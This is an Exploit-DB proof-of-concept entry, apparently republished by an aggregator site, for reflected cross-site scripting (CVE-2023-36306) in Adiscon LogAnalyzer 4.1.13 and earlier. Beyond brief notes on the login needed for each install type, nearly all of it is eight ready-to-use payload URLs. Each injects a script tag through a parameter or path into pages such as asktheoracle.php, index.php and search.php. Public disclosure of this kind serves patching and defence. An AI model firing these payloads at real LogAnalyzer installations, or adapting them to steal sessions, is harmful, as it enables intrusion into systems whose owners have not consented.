[webapps] Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
2023-8-4 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏

# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
# Date: 2023.Aug.01
# Exploit Author: Pedro (ISSDU TW)
# Vendor Homepage: https://loganalyzer.adiscon.com/
# Software Link: https://loganalyzer.adiscon.com/download/
# Version: v4.1.13 and before
# Tested on: Linux
# CVE : CVE-2023-36306

There are several installation method.
If you installed without database(File-Based),No need to login.
If you installed with database, You should login with Read Only User(at least)

XSS Payloads are as below:

XSS
http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
            

文章来源: https://www.exploit-db.com/exploits/51643
如有侵权请联系:admin#unsafe.sh